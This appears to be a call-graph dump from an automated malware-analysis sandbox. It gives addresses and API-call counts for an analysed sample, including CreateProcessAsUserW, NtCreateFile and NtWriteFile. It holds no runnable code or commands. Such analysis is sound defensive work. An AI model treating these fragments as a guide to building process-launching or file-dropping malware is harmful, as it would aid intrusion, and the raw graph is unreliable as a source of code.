2d347ec 11 API calls 76219->76222 76223 2d56053 76220->76223 76225 2d58370 76221->76225 76226 2d57841 76222->76226 76224 2d489d0 20 API calls 76223->76224 76227 2d56077 76224->76227 76229 2d489d0 20 API calls 76225->76229 76230 2d489d0 20 API calls 76226->76230 76228 2d34860 11 API calls 76227->76228 76235 2d56098 76228->76235 76231 2d58394 76229->76231 76232 2d57865 76230->76232 76233 2d34860 11 API calls 76231->76233 76234 2d34860 11 API calls 76232->76234 76238 2d583b5 76233->76238 76236 2d57886 76234->76236 76237 2d347ec 11 API calls 76235->76237 76240 2d347ec 11 API calls 76236->76240 76241 2d560cf 76237->76241 76239 2d347ec 11 API calls 76238->76239 76243 2d583ec 76239->76243 76244 2d578bd 76240->76244 76242 2d489d0 20 API calls 76241->76242 76245 2d560f3 76242->76245 76247 2d489d0 20 API calls 76243->76247 76248 2d489d0 20 API calls 76244->76248 76246 2d34860 11 API calls 76245->76246 76253 2d56114 76246->76253 76249 2d58410 76247->76249 76250 2d578e1 76248->76250 76251 2d34860 11 API calls 76249->76251 76252 2d34860 11 API calls 76250->76252 76256 2d58431 76251->76256 76254 2d57902 76252->76254 76255 2d347ec 11 API calls 76253->76255 76257 2d347ec 11 API calls 76254->76257 76259 2d5614b 76255->76259 76258 2d347ec 11 API calls 76256->76258 76262 2d57939 76257->76262 76261 2d58468 76258->76261 76260 2d489d0 20 API calls 76259->76260 76263 2d5616f 76260->76263 76265 2d489d0 20 API calls 76261->76265 76266 2d489d0 20 API calls 76262->76266 76264 2d34860 11 API calls 76263->76264 76272 2d561a9 76264->76272 76267 2d5848c 76265->76267 76268 2d5795d 76266->76268 76269 2d34860 11 API calls 76267->76269 76270 2d347ec 11 API calls 76268->76270 76274 2d584ad 76269->76274 76271 2d57975 76270->76271 76275 2d485bc 18 API calls 76271->76275 76273 2d34860 11 API calls 76272->76273 76279 2d561e1 76273->76279 76278 2d347ec 11 API calls 76274->76278 76276 2d57986 76275->76276 76277 2d34860 11 API calls 76276->76277 76281 2d579a7 76277->76281 76280 2d584e4 76278->76280 76282 2d347ec 11 API calls 76279->76282 76283 2d489d0 20 API calls 76280->76283 76284 2d347ec 11 API calls 76281->76284 76286 2d56218 76282->76286 76285 2d58508 76283->76285 76290 2d579de 76284->76290 76288 2d593a1 76285->76288 76289 2d5851d 76285->76289 76287 2d489d0 20 API calls 76286->76287 76292 2d5623c 76287->76292 76291 2d34860 11 API calls 76288->76291 76293 2d34860 11 API calls 76289->76293 76296 2d489d0 20 API calls 76290->76296 76299 2d593c2 76291->76299 76294 2d34860 11 API calls 76292->76294 76295 2d5853e 76293->76295 76301 2d5625d 76294->76301 76300 2d58556 76295->76300 76297 2d57a02 76296->76297 76298 2d34860 11 API calls 76297->76298 76304 2d57a23 76298->76304 76302 2d347ec 11 API calls 76299->76302 76303 2d347ec 11 API calls 76300->76303 76305 2d347ec 11 API calls 76301->76305 76309 2d593f9 76302->76309 76306 2d58575 76303->76306 76307 2d347ec 11 API calls 76304->76307 76310 2d56294 76305->76310 76308 2d5858d 76306->76308 76316 2d57a5a 76307->76316 76312 2d489d0 20 API calls 76308->76312 76311 2d489d0 20 API calls 76309->76311 76314 2d489d0 20 API calls 76310->76314 76313 2d5941d 76311->76313 76315 2d58599 76312->76315 76317 2d34860 11 API calls 76313->76317 76318 2d562b8 76314->76318 76319 2d34860 11 API calls 76315->76319 76322 2d489d0 20 API calls 76316->76322 76325 2d5943e 76317->76325 76320 2d34860 11 API calls 76318->76320 76321 2d585ba 76319->76321 76326 2d562d9 76320->76326 76327 2d585c5 76321->76327 76323 2d57a7e 76322->76323 76324 2d34860 11 API calls 76323->76324 76330 2d57a9f 76324->76330 76328 2d347ec 11 API calls 76325->76328 76331 2d347ec 11 API calls 76326->76331 76329 2d347ec 11 API calls 76327->76329 76334 2d59475 76328->76334 76332 2d585f1 76329->76332 76333 2d347ec 11 API calls 76330->76333 76336 2d56310 76331->76336 76335 2d585fc 76332->76335 76341 2d57ad6 76333->76341 76338 2d489d0 20 API calls 76334->76338 76337 2d489d0 20 API calls 76335->76337 76339 2d489d0 20 API calls 76336->76339 76340 2d58615 76337->76340 76342 2d59499 76338->76342 76344 2d56334 76339->76344 76345 2d34860 11 API calls 76340->76345 76347 2d489d0 20 API calls 76341->76347 76343 2d34860 11 API calls 76342->76343 76348 2d594ba 76343->76348 76346 2d34860 11 API calls 76344->76346 76349 2d58636 76345->76349 76350 2d56355 76346->76350 76351 2d57afa 76347->76351 76352 2d347ec 11 API calls 76348->76352 76353 2d347ec 11 API calls 76349->76353 76354 2d347ec 11 API calls 76350->76354 77521 2d4adf8 29 API calls 76351->77521 76358 2d594f1 76352->76358 76359 2d5866d 76353->76359 76360 2d5638c 76354->76360 76356 2d57b21 76357 2d34860 11 API calls 76356->76357 76364 2d57b42 76357->76364 76362 2d489d0 20 API calls 76358->76362 76361 2d489d0 20 API calls 76359->76361 76365 2d489d0 20 API calls 76360->76365 76363 2d58691 76361->76363 76374 2d59515 76362->76374 76367 2d347ec 11 API calls 76363->76367 76370 2d347ec 11 API calls 76364->76370 76366 2d563b0 76365->76366 76368 2d34860 11 API calls 76366->76368 76369 2d586bd 76367->76369 76375 2d563d1 76368->76375 76373 2d586d5 76369->76373 76376 2d57b79 76370->76376 76371 2d59cf5 76372 2d34860 11 API calls 76371->76372 76378 2d59d16 76372->76378 76380 2d586e0 CreateProcessAsUserW 76373->76380 76374->76371 76377 2d34860 11 API calls 76374->76377 76379 2d347ec 11 API calls 76375->76379 76381 2d489d0 20 API calls 76376->76381 76389 2d59560 76377->76389 76385 2d347ec 11 API calls 76378->76385 76391 2d56408 76379->76391 76382 2d586f2 76380->76382 76383 2d5876e 76380->76383 76384 2d57b9d 76381->76384 76387 2d34860 11 API calls 76382->76387 76386 2d34860 11 API calls 76383->76386 76388 2d34860 11 API calls 76384->76388 76395 2d59d4d 76385->76395 76397 2d5878f 76386->76397 76390 2d58713 76387->76390 76394 2d57bbe 76388->76394 76392 2d347ec 11 API calls 76389->76392 76393 2d5871e 76390->76393 76396 2d489d0 20 API calls 76391->76396 76406 2d59597 76392->76406 76399 2d347ec 11 API calls 76393->76399 76400 2d347ec 11 API calls 76394->76400 76401 2d489d0 20 API calls 76395->76401 76398 2d5642c 76396->76398 76403 2d347ec 11 API calls 76397->76403 76402 2d34860 11 API calls 76398->76402 76405 2d5874a 76399->76405 76413 2d57bf5 76400->76413 76404 2d59d71 76401->76404 76411 2d5644d 76402->76411 76412 2d587c6 76403->76412 76407 2d34860 11 API calls 76404->76407 76409 2d58755 76405->76409 76408 2d489d0 20 API calls 76406->76408 76415 2d59d92 76407->76415 76410 2d595bb 76408->76410 76418 2d489d0 20 API calls 76409->76418 76414 2d34860 11 API calls 76410->76414 76416 2d347ec 11 API calls 76411->76416 76417 2d489d0 20 API calls 76412->76417 76419 2d489d0 20 API calls 76413->76419 76425 2d595dc 76414->76425 76422 2d347ec 11 API calls 76415->76422 76426 2d56484 76416->76426 76420 2d587ea 76417->76420 76418->76383 76421 2d57c19 76419->76421 76423 2d34860 11 API calls 76420->76423 76424 2d34860 11 API calls 76421->76424 76429 2d59dc9 76422->76429 76431 2d5880b 76423->76431 76428 2d57c3a 76424->76428 76427 2d347ec 11 API calls 76425->76427 76430 2d489d0 20 API calls 76426->76430 76437 2d59613 76427->76437 76433 2d347ec 11 API calls 76428->76433 76434 2d489d0 20 API calls 76429->76434 76432 2d564a8 76430->76432 76436 2d347ec 11 API calls 76431->76436 76435 2d34860 11 API calls 76432->76435 76444 2d57c71 76433->76444 76438 2d59ded 76434->76438 76439 2d564d5 76435->76439 76443 2d58842 76436->76443 76441 2d489d0 20 API calls 76437->76441 76440 2d34860 11 API calls 76438->76440 77361 2d485bc 76439->77361 76448 2d59e0e 76440->76448 76445 2d59637 76441->76445 76450 2d489d0 20 API calls 76443->76450 76451 2d489d0 20 API calls 76444->76451 76446 2d34860 11 API calls 76445->76446 76455 2d59658 76446->76455 76454 2d347ec 11 API calls 76448->76454 76449 2d34860 11 API calls 76457 2d56507 76449->76457 76452 2d58866 76450->76452 76453 2d57c95 76451->76453 76456 2d349f8 11 API calls 76452->76456 76459 2d34860 11 API calls 76453->76459 76461 2d59e45 76454->76461 76460 2d347ec 11 API calls 76455->76460 76458 2d5888a 76456->76458 76462 2d347ec 11 API calls 76457->76462 76463 2d34860 11 API calls 76458->76463 76464 2d57cd5 76459->76464 76467 2d5968f 76460->76467 76465 2d489d0 20 API calls 76461->76465 76469 2d5653e 76462->76469 76466 2d588b9 76463->76466 76468 2d347ec 11 API calls 76464->76468 76473 2d59e69 76465->76473 76471 2d588c4 76466->76471 76470 2d489d0 20 API calls 76467->76470 76481 2d57d0c 76468->76481 76474 2d489d0 20 API calls 76469->76474 76472 2d596b3 76470->76472 76476 2d347ec 11 API calls 76471->76476 76477 2d4f094 11 API calls 76472->76477 76478 2d489d0 20 API calls 76473->76478 76475 2d56562 76474->76475 76479 2d34860 11 API calls 76475->76479 76480 2d588f0 76476->76480 76482 2d596ce 76477->76482 76486 2d59e9c 76478->76486 76487 2d56583 76479->76487 76488 2d588fb 76480->76488 76484 2d489d0 20 API calls 76481->76484 76483 2d34860 11 API calls 76482->76483 76490 2d596f7 76483->76490 76485 2d57d30 76484->76485 76489 2d34860 11 API calls 76485->76489 76492 2d489d0 20 API calls 76486->76492 76493 2d347ec 11 API calls 76487->76493 76491 2d489d0 20 API calls 76488->76491 76497 2d57d51 76489->76497 76495 2d34860 11 API calls 76490->76495 76494 2d58914 76491->76494 76499 2d59ecf 76492->76499 76500 2d565ba 76493->76500 76496 2d34860 11 API calls 76494->76496 76501 2d5972f 76495->76501 76502 2d58935 76496->76502 76498 2d347ec 11 API calls 76497->76498 76508 2d57d88 76498->76508 76503 2d489d0 20 API calls 76499->76503 76504 2d489d0 20 API calls 76500->76504 76505 2d347ec 11 API calls 76501->76505 76507 2d347ec 11 API calls 76502->76507 76510 2d59f02 76503->76510 76506 2d565de 76504->76506 76512 2d59766 76505->76512 76509 2d34860 11 API calls 76506->76509 76513 2d5896c 76507->76513 76511 2d489d0 20 API calls 76508->76511 76516 2d565ff 76509->76516 76515 2d489d0 20 API calls 76510->76515 76514 2d57dac 76511->76514 76518 2d489d0 20 API calls 76512->76518 76520 2d489d0 20 API calls 76513->76520 76517 2d34860 11 API calls 76514->76517 76519 2d59f35 76515->76519 76523 2d347ec 11 API calls 76516->76523 76527 2d57dcd 76517->76527 76521 2d5978a 76518->76521 76522 2d34860 11 API calls 76519->76522 76524 2d58990 76520->76524 76525 2d34860 11 API calls 76521->76525 76528 2d59f56 76522->76528 76529 2d56636 76523->76529 76526 2d34860 11 API calls 76524->76526 76531 2d597ab 76525->76531 76532 2d589b1 76526->76532 76530 2d347ec 11 API calls 76527->76530 76533 2d347ec 11 API calls 76528->76533 76534 2d489d0 20 API calls 76529->76534 76538 2d57e04 76530->76538 76535 2d347ec 11 API calls 76531->76535 76537 2d347ec 11 API calls 76532->76537 76541 2d59f8d 76533->76541 76536 2d5665a 76534->76536 76544 2d597e2 76535->76544 76539 2d34860 11 API calls 76536->76539 76542 2d589e8 76537->76542 76540 2d489d0 20 API calls 76538->76540 76546 2d5667b 76539->76546 76543 2d57e28 76540->76543 76545 2d489d0 20 API calls 76541->76545 76550 2d489d0 20 API calls 76542->76550 77522 2d45aec 42 API calls 76543->77522 76548 2d489d0 20 API calls 76544->76548 76549 2d59fb1 76545->76549 76554 2d347ec 11 API calls 76546->76554 76552 2d59806 76548->76552 76553 2d34860 11 API calls 76549->76553 76555 2d58a0c 76550->76555 76557 2d37e5c GetFileAttributesA 76552->76557 76567 2d59fd2 76553->76567 76568 2d566b2 76554->76568 77378 2d4d164 76555->77378 76556 2d57e54 76564 2d34bcc 11 API calls 76556->76564 76559 2d59810 76557->76559 76561 2d59aef 76559->76561 76562 2d59818 76559->76562 76566 2d34860 11 API calls 76561->76566 76565 2d34860 11 API calls 76562->76565 76569 2d57e69 76564->76569 76574 2d59839 76565->76574 76575 2d59b10 76566->76575 76571 2d347ec 11 API calls 76567->76571 76572 2d489d0 20 API calls 76568->76572 76570 2d34860 11 API calls 76569->76570 76576 2d57e8a 76570->76576 76580 2d5a009 76571->76580 76582 2d566d6 76572->76582 76578 2d347ec 11 API calls 76574->76578 76579 2d347ec 11 API calls 76575->76579 76584 2d347ec 11 API calls 76576->76584 76591 2d59870 76578->76591 76589 2d59b47 76579->76589 76586 2d489d0 20 API calls 76580->76586 76581 2d56949 76583 2d34860 11 API calls 76581->76583 76582->76581 76585 2d34860 11 API calls 76582->76585 76594 2d5696a 76583->76594 76595 2d57ec1 76584->76595 76592 2d5670c 76585->76592 76587 2d5a02d 76586->76587 76590 2d34860 11 API calls 76587->76590 76597 2d489d0 20 API calls 76589->76597 76607 2d5a04e 76590->76607 76596 2d489d0 20 API calls 76591->76596 76601 2d347ec 11 API calls 76592->76601 76603 2d347ec 11 API calls 76594->76603 76604 2d489d0 20 API calls 76595->76604 76599 2d59894 76596->76599 76600 2d59b6b 76597->76600 76605 2d34860 11 API calls 76599->76605 76606 2d34860 11 API calls 76600->76606 76610 2d56743 76601->76610 76612 2d569a1 76603->76612 76608 2d57ee5 76604->76608 76615 2d598b5 76605->76615 76616 2d59b8c 76606->76616 76609 2d347ec 11 API calls 76607->76609 77523 2d349f8 76608->77523 76624 2d5a085 76609->76624 76618 2d489d0 20 API calls 76610->76618 76620 2d489d0 20 API calls 76612->76620 76622 2d347ec 11 API calls 76615->76622 76623 2d347ec 11 API calls 76616->76623 76625 2d56767 76618->76625 76626 2d569c5 76620->76626 76621 2d57f08 76628 2d34860 11 API calls 76621->76628 76632 2d598ec 76622->76632 76633 2d59bc3 76623->76633 76630 2d489d0 20 API calls 76624->76630 76629 2d34860 11 API calls 76625->76629 76627 2d34860 11 API calls 76626->76627 76636 2d569e6 76627->76636 76637 2d57f29 76628->76637 76634 2d56788 76629->76634 76639 2d5a0a9 76630->76639 76641 2d489d0 20 API calls 76632->76641 76638 2d489d0 20 API calls 76633->76638 76644 2d347ec 11 API calls 76634->76644 76646 2d347ec 11 API calls 76636->76646 76647 2d347ec 11 API calls 76637->76647 76643 2d59be7 76638->76643 76650 2d489d0 20 API calls 76639->76650 76642 2d59910 76641->76642 76648 2d34860 11 API calls 76642->76648 76649 2d34860 11 API calls 76643->76649 76651 2d567bf 76644->76651 76653 2d56a1d 76646->76653 76654 2d57f60 76647->76654 76655 2d59931 76648->76655 76656 2d59c08 76649->76656 76657 2d5a0dc 76650->76657 76658 2d489d0 20 API calls 76651->76658 76660 2d489d0 20 API calls 76653->76660 76661 2d489d0 20 API calls 76654->76661 76663 2d347ec 11 API calls 76655->76663 76664 2d347ec 11 API calls 76656->76664 76665 2d489d0 20 API calls 76657->76665 76666 2d567e3 76658->76666 76667 2d56a41 76660->76667 76662 2d57f84 76661->76662 76668 2d34860 11 API calls 76662->76668 76672 2d59968 76663->76672 76673 2d59c3f 76664->76673 76674 2d5a10f 76665->76674 76669 2d34860 11 API calls 76666->76669 76670 2d34860 11 API calls 76667->76670 76676 2d57fa5 76668->76676 76677 2d56804 76669->76677 76675 2d56a62 76670->76675 76680 2d489d0 20 API calls 76672->76680 76681 2d489d0 20 API calls 76673->76681 76682 2d489d0 20 API calls 76674->76682 76686 2d347ec 11 API calls 76675->76686 76687 2d347ec 11 API calls 76676->76687 76684 2d347ec 11 API calls 76677->76684 76688 2d5998c 76680->76688 76683 2d59c63 76681->76683 76695 2d5a142 76682->76695 76689 2d34860 11 API calls 76683->76689 76697 2d5683b 76684->76697 76698 2d56a99 76686->76698 76699 2d57fdc 76687->76699 76692 2d4e358 11 API calls 76688->76692 76701 2d59c84 76689->76701 76693 2d599a1 76692->76693 76694 2d34530 11 API calls 76693->76694 76696 2d599b1 76694->76696 76702 2d489d0 20 API calls 76695->76702 76700 2d34860 11 API calls 76696->76700 76704 2d489d0 20 API calls 76697->76704 76705 2d489d0 20 API calls 76698->76705 76706 2d489d0 20 API calls 76699->76706 76715 2d599d2 76700->76715 76707 2d347ec 11 API calls 76701->76707 76716 2d5a175 76702->76716 76708 2d5685f 76704->76708 76710 2d56abd 76705->76710 76711 2d58000 76706->76711 76718 2d59cbb 76707->76718 76712 2d34860 11 API calls 76708->76712 76713 2d34860 11 API calls 76710->76713 76714 2d34860 11 API calls 76711->76714 76724 2d56880 76712->76724 76721 2d56ade 76713->76721 76722 2d58021 76714->76722 76717 2d347ec 11 API calls 76715->76717 76719 2d489d0 20 API calls 76716->76719 76734 2d59a09 76717->76734 76726 2d489d0 20 API calls 76718->76726 76723 2d5a1a8 76719->76723 76729 2d347ec 11 API calls 76721->76729 76730 2d347ec 11 API calls 76722->76730 76727 2d34860 11 API calls 76723->76727 76732 2d347ec 11 API calls 76724->76732 76731 2d59cdf 76726->76731 76738 2d5a1c9 76727->76738 76742 2d56b15 76729->76742 76743 2d58058 76730->76743 76735 2d349f8 11 API calls 76731->76735 76741 2d568b7 76732->76741 76739 2d489d0 20 API calls 76734->76739 76736 2d59ce9 76735->76736 77531 2d48d70 31 API calls 76736->77531 76745 2d347ec 11 API calls 76738->76745 76740 2d59a2d 76739->76740 76744 2d34860 11 API calls 76740->76744 76747 2d489d0 20 API calls 76741->76747 76748 2d489d0 20 API calls 76742->76748 76749 2d489d0 20 API calls 76743->76749 76757 2d59a4e 76744->76757 76758 2d5a200 76745->76758 76750 2d568db 76747->76750 76752 2d56b39 76748->76752 76753 2d5807c 76749->76753 76754 2d34860 11 API calls 76750->76754 76755 2d34860 11 API calls 76752->76755 76756 2d34860 11 API calls 76753->76756 76772 2d568fc 76754->76772 76764 2d56b5a 76755->76764 76762 2d5809d 76756->76762 76759 2d347ec 11 API calls 76757->76759 76760 2d489d0 20 API calls 76758->76760 76771 2d59a85 76759->76771 76763 2d5a224 76760->76763 76768 2d347ec 11 API calls 76762->76768 76765 2d34860 11 API calls 76763->76765 76767 2d347ec 11 API calls 76764->76767 76774 2d5a245 76765->76774 76776 2d56b91 76767->76776 76777 2d580d4 76768->76777 76773 2d489d0 20 API calls 76771->76773 76775 2d4dc8c 17 API calls 76772->76775 76788 2d59aa9 76773->76788 76778 2d347ec 11 API calls 76774->76778 76775->76581 76780 2d489d0 20 API calls 76776->76780 76781 2d489d0 20 API calls 76777->76781 76787 2d5a27c 76778->76787 76783 2d56bb5 76780->76783 76784 2d580f8 76781->76784 76785 2d34860 11 API calls 76783->76785 77530 2d4b118 39 API calls 76784->77530 76793 2d56bd6 76785->76793 76790 2d489d0 20 API calls 76787->76790 76789 2d4dc8c 17 API calls 76788->76789 76789->76561 76797 2d5a2a0 76790->76797 76792 2d58109 76796 2d347ec 11 API calls 76793->76796 76800 2d56c0d 76796->76800 76799 2d489d0 20 API calls 76797->76799 76801 2d5a2d3 76799->76801 76804 2d489d0 20 API calls 76800->76804 76803 2d34860 11 API calls 76801->76803 76808 2d5a2f4 76803->76808 76806 2d56c31 76804->76806 76807 2d34860 11 API calls 76806->76807 76811 2d56c52 76807->76811 76809 2d347ec 11 API calls 76808->76809 76815 2d5a32b 76809->76815 76814 2d347ec 11 API calls 76811->76814 76818 2d56c89 76814->76818 76817 2d489d0 20 API calls 76815->76817 76819 2d5a34f 76817->76819 76822 2d489d0 20 API calls 76818->76822 76821 2d34860 11 API calls 76819->76821 76825 2d5a370 76821->76825 76824 2d56cad 76822->76824 76826 2d34860 11 API calls 76824->76826 76827 2d347ec 11 API calls 76825->76827 76831 2d56ced 76826->76831 76832 2d5a3a7 76827->76832 76834 2d347ec 11 API calls 76831->76834 76835 2d489d0 20 API calls 76832->76835 76839 2d56d24 76834->76839 76836 2d5a3cb 76835->76836 76837 2d34860 11 API calls 76836->76837 76842 2d5a3ec 76837->76842 76841 2d489d0 20 API calls 76839->76841 76843 2d56d48 76841->76843 76844 2d347ec 11 API calls 76842->76844 76846 2d34860 11 API calls 76843->76846 76849 2d5a423 76844->76849 76852 2d56d77 76846->76852 76851 2d489d0 20 API calls 76849->76851 76857 2d5a447 76851->76857 77519 2d37990 11 API calls 76852->77519 76855 2d56da1 76856 2d347ec 11 API calls 76855->76856 76859 2d56db7 76856->76859 76860 2d489d0 20 API calls 76857->76860 76861 2d34860 11 API calls 76859->76861 76863 2d5a47a 76860->76863 76866 2d56de8 76861->76866 76867 2d489d0 20 API calls 76863->76867 76869 2d347ec 11 API calls 76866->76869 76870 2d5a4ad 76867->76870 76872 2d56e1f 76869->76872 76873 2d489d0 20 API calls 76870->76873 76875 2d489d0 20 API calls 76872->76875 76879 2d5a4e0 76873->76879 76876 2d56e43 76875->76876 76877 2d34860 11 API calls 76876->76877 76884 2d56e64 76877->76884 76881 2d489d0 20 API calls 76879->76881 76882 2d5a513 76881->76882 76885 2d34860 11 API calls 76882->76885 76887 2d347ec 11 API calls 76884->76887 76888 2d5a534 76885->76888 76890 2d56e9b 76887->76890 76891 2d347ec 11 API calls 76888->76891 76893 2d489d0 20 API calls 76890->76893 76895 2d5a56b 76891->76895 76894 2d56ebf 76893->76894 77520 2d37990 11 API calls 76894->77520 76900 2d489d0 20 API calls 76895->76900 76899 2d56ed5 76902 2d347ec 11 API calls 76899->76902 76903 2d5a58f 76900->76903 76905 2d56eeb 76902->76905 76906 2d34860 11 API calls 76903->76906 76907 2d34860 11 API calls 76905->76907 76908 2d5a5b0 76906->76908 76912 2d56f1c 76907->76912 76910 2d347ec 11 API calls 76908->76910 76914 2d5a5e7 76910->76914 76913 2d347ec 11 API calls 76912->76913 76918 2d56f53 76913->76918 76916 2d489d0 20 API calls 76914->76916 76923 2d5a60b 76916->76923 76921 2d489d0 20 API calls 76918->76921 76922 2d56f77 76921->76922 76924 2d34860 11 API calls 76922->76924 76925 2d489d0 20 API calls 76923->76925 76928 2d56f98 76924->76928 76929 2d5a63e 76925->76929 76930 2d347ec 11 API calls 76928->76930 76931 2d489d0 20 API calls 76929->76931 76935 2d56fcf 76930->76935 76936 2d5a671 76931->76936 76938 2d489d0 20 API calls 76935->76938 76940 2d489d0 20 API calls 76936->76940 76939 2d56ff3 76938->76939 76941 2d34860 11 API calls 76939->76941 76943 2d5a6a4 76940->76943 76945 2d5702d 76941->76945 76946 2d489d0 20 API calls 76943->76946 77373 2d44dd4 76945->77373 76948 2d5a6d7 76946->76948 76952 2d489d0 20 API calls 76948->76952 76951 2d57055 76954 2d5a70a 76952->76954 76955 2d34860 11 API calls 76954->76955 76958 2d5a72b 76955->76958 76959 2d347ec 11 API calls 76958->76959 76961 2d5a762 76959->76961 76964 2d489d0 20 API calls 76961->76964 76965 2d5a786 76964->76965 76966 2d34860 11 API calls 76965->76966 76972 2d5a7a7 76966->76972 76975 2d347ec 11 API calls 76972->76975 76979 2d5a7de 76975->76979 76982 2d489d0 20 API calls 76979->76982 76984 2d5a802 76982->76984 76985 2d34860 11 API calls 76984->76985 76987 2d5a823 76985->76987 76989 2d347ec 11 API calls 76987->76989 76991 2d5a85a 76989->76991 76994 2d489d0 20 API calls 76991->76994 76996 2d5a87e 76994->76996 76997 2d34860 11 API calls 76996->76997 76999 2d5a89f 76997->76999 77001 2d347ec 11 API calls 76999->77001 77004 2d5a8d6 77001->77004 77005 2d489d0 20 API calls 77004->77005 77006 2d5a8fa 77005->77006 77007 2d34860 11 API calls 77006->77007 77008 2d5a91b 77007->77008 77009 2d347ec 11 API calls 77008->77009 77010 2d5a952 77009->77010 77011 2d489d0 20 API calls 77010->77011 77012 2d5a976 77011->77012 77013 2d489d0 20 API calls 77012->77013 77014 2d5a985 77013->77014 77015 2d489d0 20 API calls 77014->77015 77016 2d5a994 77015->77016 77017 2d489d0 20 API calls 77016->77017 77018 2d5a9a3 77017->77018 77019 2d489d0 20 API calls 77018->77019 77020 2d5a9b2 77019->77020 77021 2d489d0 20 API calls 77020->77021 77022 2d5a9c1 77021->77022 77023 2d489d0 20 API calls 77022->77023 77024 2d5a9d0 77023->77024 77025 2d489d0 20 API calls 77024->77025 77026 2d5a9df 77025->77026 77027 2d489d0 20 API calls 77026->77027 77028 2d5a9ee 77027->77028 77141 2d4f0b9 77140->77141 77142 2d4f0e5 77141->77142 77532 2d346c4 11 API calls 77141->77532 77533 2d34530 11 API calls 77141->77533 77144 2d344dc 11 API calls 77142->77144 77145 2d4f0fa 77144->77145 77145->75605 77148 2d34bcc 11 API calls 77147->77148 77149 2d4e370 77148->77149 77150 2d4e391 77149->77150 77151 2d349f8 11 API calls 77149->77151 77150->75639 77151->77149 77153 2d4dca2 77152->77153 77534 2d34f20 77153->77534 77155 2d4dcaa 77156 2d4dcca RtlDosPathNameToNtPathName_U 77155->77156 77538 2d4dbdc 77156->77538 77158 2d4dce6 NtCreateFile 77159 2d4dd11 77158->77159 77160 2d349f8 11 API calls 77159->77160 77161 2d4dd23 NtWriteFile NtClose 77160->77161 77162 2d4dd4d 77161->77162 77539 2d34c60 77162->77539 77165 2d344dc 11 API calls 77166 2d4dd5d Sleep 77165->77166 77166->75643 77168 2d4e681 77167->77168 77168->77168 77169 2d34860 11 API calls 77168->77169 77170 2d4e6ca 77169->77170 77171 2d347ec 11 API calls 77170->77171 77172 2d4e6ef 77171->77172 77173 2d489d0 20 API calls 77172->77173 77174 2d4e70a 77173->77174 77175 2d34860 11 API calls 77174->77175 77176 2d4e723 77175->77176 77177 2d347ec 11 API calls 77176->77177 77178 2d4e748 77177->77178 77179 2d489d0 20 API calls 77178->77179 77180 2d4e763 77179->77180 77181 2d34860 11 API calls 77180->77181 77182 2d4e77c 77181->77182 77183 2d347ec 11 API calls 77182->77183 77184 2d4e7a1 77183->77184 77185 2d489d0 20 API calls 77184->77185 77186 2d4e7bc 77185->77186 77187 2d34860 11 API calls 77186->77187 77188 2d4e7ee 77187->77188 77189 2d489d0 20 API calls 77188->77189 77190 2d4e838 77189->77190 77191 2d34860 11 API calls 77190->77191 77192 2d4e86f 77191->77192 77193 2d347ec 11 API calls 77192->77193 77194 2d4e894 77193->77194 77195 2d489d0 20 API calls 77194->77195 77196 2d4e8af 77195->77196 77197 2d34860 11 API calls 77196->77197 77198 2d4e8c8 77197->77198 77199 2d347ec 11 API calls 77198->77199 77200 2d4e8ed 77199->77200 77201 2d489d0 20 API calls 77200->77201 77202 2d4e908 77201->77202 77203 2d34860 11 API calls 77202->77203 77204 2d4e921 77203->77204 77205 2d347ec 11 API calls 77204->77205 77206 2d4e946 77205->77206 77207 2d489d0 20 API calls 77206->77207 77208 2d4e961 77207->77208 77542 2d37f2c 77208->77542 77210 2d4e985 77546 2d48788 77210->77546 77213 2d34860 11 API calls 77214 2d4ea0a 77213->77214 77215 2d347ec 11 API calls 77214->77215 77216 2d4ea3b 77215->77216 77217 2d489d0 20 API calls 77216->77217 77218 2d4ea5f 77217->77218 77219 2d34860 11 API calls 77218->77219 77220 2d4ea7b 77219->77220 77221 2d347ec 11 API calls 77220->77221 77222 2d4eaac 77221->77222 77223 2d489d0 20 API calls 77222->77223 77224 2d4ead0 77223->77224 77225 2d34860 11 API calls 77224->77225 77226 2d4eaec 77225->77226 77227 2d347ec 11 API calls 77226->77227 77228 2d4eb1d 77227->77228 77229 2d489d0 20 API calls 77228->77229 77230 2d4eb41 77229->77230 77231 2d34860 11 API calls 77230->77231 77232 2d4eb5d 77231->77232 77233 2d347ec 11 API calls 77232->77233 77234 2d4eb7b 77233->77234 77235 2d4894c 21 API calls 77234->77235 77236 2d4eb90 77235->77236 77237 2d34860 11 API calls 77236->77237 77238 2d4ebac 77237->77238 77239 2d347ec 11 API calls 77238->77239 77240 2d4ebca 77239->77240 77241 2d4894c 21 API calls 77240->77241 77242 2d4ebdf 77241->77242 77243 2d34860 11 API calls 77242->77243 77244 2d4ebfb 77243->77244 77245 2d347ec 11 API calls 77244->77245 77246 2d4ec19 77245->77246 77247 2d4894c 21 API calls 77246->77247 77248 2d4ec2e 77247->77248 77249 2d34860 11 API calls 77248->77249 77250 2d4ec4a 77249->77250 77251 2d347ec 11 API calls 77250->77251 77252 2d4ec68 77251->77252 77253 2d4894c 21 API calls 77252->77253 77254 2d4ec7d 77253->77254 77255 2d4ec87 77254->77255 77256 2d4eee2 77254->77256 77257 2d34860 11 API calls 77255->77257 77258 2d34500 11 API calls 77256->77258 77261 2d4eca3 77257->77261 77259 2d4eeff 77258->77259 77260 2d34c60 SysFreeString 77259->77260 77262 2d4ef0a 77260->77262 77264 2d347ec 11 API calls 77261->77264 77263 2d34500 11 API calls 77262->77263 77265 2d4ef1a 77263->77265 77269 2d4ecd4 77264->77269 77266 2d34c60 SysFreeString 77265->77266 77267 2d4ef22 77266->77267 77268 2d34500 11 API calls 77267->77268 77270 2d4ef2f 77268->77270 77271 2d489d0 20 API calls 77269->77271 77270->75663 77272 2d4ecf8 77271->77272 77273 2d34860 11 API calls 77272->77273 77274 2d4ed14 77273->77274 77275 2d347ec 11 API calls 77274->77275 77276 2d4ed45 77275->77276 77277 2d489d0 20 API calls 77276->77277 77278 2d4ed69 WaitForSingleObject CloseHandle CloseHandle 77277->77278 77279 2d34860 11 API calls 77278->77279 77280 2d4eda0 77279->77280 77281 2d347ec 11 API calls 77280->77281 77282 2d4edbe 77281->77282 77283 2d4894c 21 API calls 77282->77283 77284 2d4edd3 77283->77284 77285 2d34860 11 API calls 77284->77285 77286 2d4edef 77285->77286 77287 2d347ec 11 API calls 77286->77287 77288 2d4ee0d 77287->77288 77289 2d4894c 21 API calls 77288->77289 77290 2d4ee22 77289->77290 77291 2d34860 11 API calls 77290->77291 77292 2d4ee3e 77291->77292 77293 2d347ec 11 API calls 77292->77293 77294 2d4ee5c 77293->77294 77295 2d4894c 21 API calls 77294->77295 77296 2d4ee71 77295->77296 77297 2d34860 11 API calls 77296->77297 77298 2d4ee8d 